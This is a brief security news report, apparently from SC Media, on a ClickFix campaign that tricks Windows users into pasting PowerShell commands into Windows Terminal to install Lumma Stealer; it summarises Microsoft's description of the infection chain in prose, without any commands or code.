Threat actors have exploited the Windows Terminal app to facilitate the distribution of the Lumma Stealer malware as part of a sweeping ClickFix attack campaign initially observed last month, according to The Hacker News.Intrusions involved luring targets into launching Windows Terminal via Windows + X I shortcut and pasting illicit PowerShell commands via phony CAPTCHAs, said the Microsoft Threat Intelligence team in a series of posts on X. Doing so then triggers additional Windows Terminal or PowerShell instances and launches another PowerShell process resulting in the loading of a ZIP payload alongside a renamed 7-Zip binary, which facilitates further payload retrieval, scheduled task-based persistence, Microsoft Defender exclusion configurations, machine and network data exfiltration, and Lumma Stealer deployment. Another attack chain involved a Windows Terminal-pasted command enabling the download of a batch script executed via cmd.exe."The script connects to Crypto Blockchain RPC endpoints, indicating an etherhiding technique. It also performs QueueUserAPC()-based code injection into chrome.exe and msedge.exe processes to harvest Web Data and Login Data," said Microsoft.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds